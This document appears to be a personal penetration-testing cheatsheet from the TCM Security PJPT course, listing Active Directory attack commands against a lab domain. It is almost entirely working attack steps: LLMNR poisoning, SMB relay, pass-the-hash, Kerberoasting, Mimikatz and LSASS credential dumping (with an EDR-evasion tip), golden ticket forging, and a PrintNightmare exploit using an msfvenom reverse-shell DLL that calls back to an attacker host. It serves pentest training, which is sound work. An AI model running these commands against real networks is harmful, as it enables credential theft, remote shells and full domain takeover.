PJPT-Notes

Cheatsheet from the PJPT course of TCM security.

Enumeration

sudo arp-scan -l

netdiscover -r 192.168.5.0/24

nmap -T4 -p- -A 192.168.5.0/24
nmap -T4 -p- -A 192.168.5.1

nmap -T4 -p- -sS -sC 192.168.5.0/24

Initial attacks for Active Directory

LLMNR Poisoning

1. Start Responder, to capture NTLMv2 hashes

sudo responder -I tun0 -dP

2. If NTLMv2 hash was captured, copy it, save it to a txt file and crack it with hashcat

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

SMB Relay attack

This attacks works, when SMB signing is disabled on the machines.

1. Enumerate, if SMB signing is disabled

nmap -p445 192.168.5.0/24 --script=smb2-security-mode

2. Make changes in the Responder configuration

sudo nano /etc/responder/Responder.conf

SMB = Off
HTTP = Off

3. Start Responder

sudo responder -I tun0 -dP

4. Setup the relay

# to dump password hashes
sudo ntlmrelayx.py -tf targets.txt -smb2support

# to create a interactive shell
sudo ntlmrelayx.py -tf targets.txt -smb2support -i

# to run commands to proof
sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

Gaining Shell Access

Psexec

Create a shell with psexec

# for domain users
psexec.py test.local/fcastle:'Password1'@192.168.5.1

# for local users
psexec.py fcastle:'Password1'@192.168.5.1

# with local user and password hash
psexec.py [email protected] --hashes [LM-hash]:[NTLM-hash]

Wmiexec

Create a shell with wmiexec

# with local user and password hash
wmiexec.py [email protected] --hashes [LM-hash]:[NTLM-hash]

Smbexec

Create a shell with smbexec

# with local user and password hash
smbexec.py test.local/fcastle:'Password1'@192.168.5.1

Metasploit

Create a shell with metasploit

use exploit/windows/smb/psexec
set SMBDomain test.local
set SMBUser fcastle
set SMBPass Password1
set RHOSTS 192.168.5.2

IPv6 attacks

If IPv6 is activated in the network, but no DNS server in use, we can imitate one.

1. Open mitm6 for target domain

sudo mitm6 -d test.local

2. Start Ntlmrelayx.py

Ntlmrelayx.py -6 -t ldaps://192.168.5.1 -wh fakewpad.test.local -l lootme

3. You results will save into: '/home/kali/lootme/domain_computers.html'

Post Compromise Enumeration Active Directory

Domain Enumeration with ldapdomaindump

Domain Enumeration with ldapdomaindump

1. Run ldapdomaindump against domain controller - this will create files with information in about the domain

sudo ldapdomaindump ldaps://192.168.5.1 -u 'test.local\fcastle\' -p Password1

2. list all files and open the html files to investigate the domain information

# list all files
ls -l

# open up all html domain files
firefox domain_*.html

Domain Enumeration with Bloodhound

Domain Enumeration with Bloodhound

1. Run bloodhound with credentials, to fetch information

sudo bloodhound-python -d [DOMAIN] -u [USERNAME] -p [USER-PW] -ns [DC-IP]

# example
sudo bloodhound-python -d test.local -u fcastle -p Password1 -ns 192.168.5.1 -c all

2. Start up neo4j database and bloodhound to import the files

# if you started the database the first time, set a new password - REMEMBER THE PASSWORD!
sudo neo4j console

# start bloodhound
sudo bloodhound

3. If bloodhound started, just drag and drop the json files into bloodhound and start investigation ;)

Domain Enumeration with Plumhound

Domain Enumeration with Plumhound

1. Start up neo4j database and bloodhound

# if you started the database the first time, set a new password - REMEMBER THE PASSWORD!
sudo neo4j console

# start bloodhound
sudo bloodhound

2. Start Plumhound against the domain controller - BLOODHOUND MUST ALREADY RUNNING!

sudo python3 PlumHound.py --easy -p [USER-PW]

sudo python3 PlumHound.py -x tasks/default.tasks -p [USER-PW]

3. Finally open up the browser and investigate the results

Post Compromise Attacks for Active Directory

Pass the Password / Pass-The-Hash

If we have credentials and have local admin privileges on a machine, we are able to dump the sam database of the computer.

If we have password hashes, but not able to crack them, we are able to use the hash to authenticate.

1. Test your credentials in the network

# this will test your credentials via SMB on the whole network. If we got a (Pwn3d!) -> we have local admin rights on this machine
crackmapexec smb 192.168.5.0/24 -d test.local -u fcastle -p Password1

# or with a password hash
crackmapexec smb 192.168.5.0/24 -d test.local -u administrator -H [HASH]

2. Let's dump some local hashes

# first way to do it - Secretsdump - With Credentials
secretsdump.py test.local\fcastle:[email protected]

# second way to do it - Secretsdump - With Password-Hash
secretsdump.py [email protected] --hashes [LM-HASH]:[NT-HASH]

# third way to do it - Metasploit
use windows/smb/psexec
set SMBDomain test.local
set SMBUser fcastle
set SMBPass Password1
set RHOSTS 192.168.5.2
run
hashdump

Command	Description
--local-auth	authenticate locally to each target
--sam	Dump SAM hashes from target system
--lsa	Dump LSA secrets from target system
--shares	enumerate shares and access
-M	Specify the module
-L	List available modules for each protocol

3. Let's use some Modules in crackmapexec

# Module: lsassy
crackmapexec smb 192.168.5.0/24 -d test.local -u administrator -H [HASH] --local-auth -M lsassy

# access the crackmapexec database
cmedb

Kerberoasting

Kerberoasting aims against accounts with a Service Principal Name (SPNs), for which every domain user is able to request a TGS for this user.

With the request, we get the password hash and crack it offline.

1. Get SPNs with impacket

# Get SPNs with impacket GetUserSPNs
python GetUserSPNs.py test.local/fcastle:Password1 -dc-ip 192.168.5.1 -request

2. Copy the hash/hashes and save to txt file - then run hashcat against it

# run hashcat to crack the hash
hashcat -m 13100 SPNs-hash.txt /usr/share/wordlists/rockyou.txt

Token Impersonation

If we have a active shell on a system, we can see all tokens on the machine.

With that, we are able to impersonate other users.

1. For this specific scenario, we have a meterpreter shell

meterpreter > list_tokens -u

2. Impersonate a user - example administrator

meterpreter > impersonate_token test\\administrator

Credential Dumping with different methods

1. Credential Dumping with Mimikatz

mimikatz(powershell) # privilege::debug
mimikatz(powershell) # lsadump::lsa /patch

mimikatz(powershell) # sekurlsa::minidump lsass.DMP

mimikatz(powershell) # sekurlsa::logonPasswords

2. LSASS dump file with Task Manager

# if you have a graphical user interface
# 1. Open Task Manager
# 2. Go to Details
# 3. Search for lsass.exe process
# 4. Right-click -> Create dump file (lsass.DMP)
# 5. Move the dump file to your kali machine
# 6. Extract passwords and password hashes: pypykatz lsa minidump lsass.DMP

3. LSASS dump with procdump

# on target machine
procdump.exe -accepteula -ma lsass.exe out.dmp
procdump.exe -accepteula -ma “lsass.exe” out.dmp

# some edr search for lsass string - use PID instead of name
Get-Process lsass # PowerShell
tasklist | findstr lsass # CMD

# create a dump file
procdump.exe -accepteula -ma 580 out.dmp

4. LSASS dump with Crackmapexec

crackmapexec smb 192.168.5.0/24 -d test.local -u fcastle -p Password1 --lsa

# remind: we get password hashes and cleartext password, but they will not stored on the cmedb
crackmapexec smb 192.168.5.0/24 -d test.local -u fcastle -p Password1 -M lsassy

CMD / PowerShell magic

If we have the privileges with administrator account to add a compromised account to the local admin group or Domain Admin group.

How to add a new user and add him to domain admin group

# create a new user local user
net user /add pentester Please-Use-A-Strong-PW!56&

# add the user to local admin group
net localgroup Administrators pentester /add

How to add a new user and add him to domain admin group

# create a new user
net user /add pentester Please-Use-A-Strong-PW!56& /domain

# add the user to domain admin group
net group "Domain Admins" pentester /ADD /DOMAIN

GPP attacks - cPassword

cPasswords are still common in xml files, foundable on NETLOGON/SYSVOL share of the domain controller.

Microsoft accidenatially published the key to decrypt them :)

Using Metasploit

use auxiliary/smb_enum_gpp

Decrypt the cPassword

# tool is default in kali
gpp-decrypt <PASSWORD>

We own the domain - Now What?

Dumping NTDS.dit database

secretsdump.py test.local\fcastle:[email protected] -just-dc-ntlm 

Golden Ticket

We are using Mimikatz for this step.

privilege::debug

# pull down the user we want
lsadump::lsa /inject /name:krbtgt

# Now create the golden ticket:
# we need following information from the output:
# SID of the domain
# NTLM hash of the krbtgt account
kerberos::golden /User:Administrator /domain:test.local /sid:S-1-5-21-3311685201-1443070845-3622335404 /krbtgt:3f5f8a614cf590401df166f81b87bf17 /id:500 /ptt

# next we want the golden ticket cmd
misc::cmd

# now check our privileges, with accessing another machine
dir \\Client-01\c$

Additional Active Directory attacks

ZeroLogon

NOTE: ZEROLOGON CAN CAUSE A REAL DAMAGE TO YOUR DOMAIN CONTROLLER - IN WORSE CASE YOU HAVE A INFUNCTIONAL DOMAIN CONTROLLER!

But Why? Because this vulnerability sets the Domain Controller password to null and take over the entire Domain Controller.

Pentest behaviour: You will and want test the domain controllers for the vulnerability. The exploitation is most of the time not necessary - talk with your client!

https://github.com/SecuraBV/CVE-2020-1472

1. Let's test our Domain Controller, if we are vulnerable

# setup the scan script, if the DC is vulnerable
git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
sudo pip3 install -r requirements.txt

# run a scan against the domain controller, to check if its vulnerable
python3 zerologon_tester.py DC-01 192.168.5.1

PrintNightmware RCE / LPE

The PrintSpooler service has functions, that users can add printers. The Service is running as SYSTEM.

We are able to import a malicious dll, to get a shell as SYSTEM.

RCE - Remote Code Execution

1. Check if the target is vulnerable

rpcdump.py @192.168.5.3 | egrep 'MS-RPRN|MS-PAR'

# if: => vulnerable
# Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
# Protocol: [MS-RPRN]: Print System Remote Protocol

2. Run the attack

# clone the repository
git clone https://github.com/cube0x0/CVE-2021-1675.git

# create a malicious DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACKER-IP> LPORT=5555 -f dll > shell.dll

# host the malicious DLL and share it
# we are sharing the current directory
smbserver.py share . -smb2support

# create listener with Metasploit
use multi/handler
set LHOST <ATTACKER-IP>
set LPORT 5555
set payload windows/x64/meterpreter/reverse_tcp

# run the attack
python3 CVE-2021-1675.py test.local/f.castle:[email protected] '\\<ATTACKER-IP>\share\shell.dll'

# we should get a meterpreter reverse shell
# now we can dump the hashes - WE ARE SYSTEM :)
hashdump

LPE - Local Privilege Escalation

With this PE action, we are able to add a new user to the local admin group.

1. Setup everything

# copy the raw PowerShell script into a new file

2. Run attack

Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default

Invoke-Nightmare -DriverName "Xerox" -NewUser "pentester" -NewPassword "Use-A-Strong-Password!5@"